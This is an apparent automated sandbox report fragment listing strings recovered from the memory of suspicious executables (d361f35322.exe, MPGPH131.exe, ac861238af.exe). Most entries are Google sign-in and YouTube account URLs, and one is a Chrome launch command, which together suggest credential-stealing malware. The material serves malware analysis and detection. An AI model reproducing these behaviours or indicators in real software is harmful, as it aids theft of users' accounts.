Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A52A0 recv, 9_2_008A52A0
Source: d361f35322.exe, 00000024.00000003.2820817674.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: in?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820817674.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: in?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/v/ equals www.youtube.com (Youtube)
Source: ac861238af.exe, 00000010.00000003.7189686015.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp, ac861238af.exe, 00000010.00000003.7258589510.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, ac861238af.exe, 00000010.00000003.7259110109.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccoun equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2824119223.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //www.youtube.co equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //www.youtube.com/accountYouTube equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: //www.youtube.com/accountYouTube/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2824119223.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Factio- equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_l= equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001477000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rgH5 equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000002.3081226044.0000000001440000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rgP equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rgkk equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3350736971.00000000013ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206207533.0000000008124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=010&t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820817674.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: gin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820817674.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: gin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/v/ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_h equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252F equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rgYouTube equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rgYouTube/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2838516911.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en(R equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820817674.000000000144A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube/v/ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en^S equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2839809905.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en} equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsig equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0YouTube equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0YouTube/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000002.3079225585.00000000013E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0raU equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000009.00000003.2912274365.0000000007DC2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3205947734.0000000007CEB000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2819482005.0000000007CBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3350736971.0000000001477000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ac861238af.exe, 00000010.00000003.2320418390.000000000336C000.00000004.00000020.00020000.00000000.sdmp, ac861238af.exe, 00000010.00000003.2320275710.0000000003355000.00000004.00000020.00020000.00000000.sdmp, ac861238af.exe, 00000010.00000003.2320347999.0000000003358000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account* equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C6A000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820817674.000000000144A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820488974.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountE equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2828616710.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2826400120.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2840128095.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountJ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206207533.0000000008124000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820488974.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206207533.0000000008124000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820488974.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820609546.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube/v/ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountkO equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: inue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtru equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2824193350.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2840876152.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2825758993.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ion_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5C equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2832279373.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2828966339.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ion_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5C! equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2832279373.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2828966339.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ion_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5C!! equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ion_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2822343743.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ion_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rgkk equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3206133655.0000000008153000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2820673524.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQwjhvMUJDldG6Innua_C1pcDG5oPAHsCGMCPvqUw802RdjX5hf3fPDpZO3Wpa0PCsK_u6Dcjg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1325622038%3A1714794747441010&theme=mn&ddm=0/v/ equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2825253363.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2824119223.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2826081966.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2825253363.0000000007CB4000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2824119223.0000000007CB5000.00000004.00000020.00020000.00000000.sdmp, d361f35322.exe, 00000024.00000003.2826081966.0000000007CE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: p%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube/v/ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3248220823.0000000007CD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 0000001B.00000003.3248220823.0000000007CD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AaSxoQx6ne11cfZ6Gk3eVqT5Cz0DLtBw7SzKkiaryluTa5kmW0zT8SNnoepGMkksmkn9pwxU7Cs4rg3xdf equals www.youtube.com (Youtube)
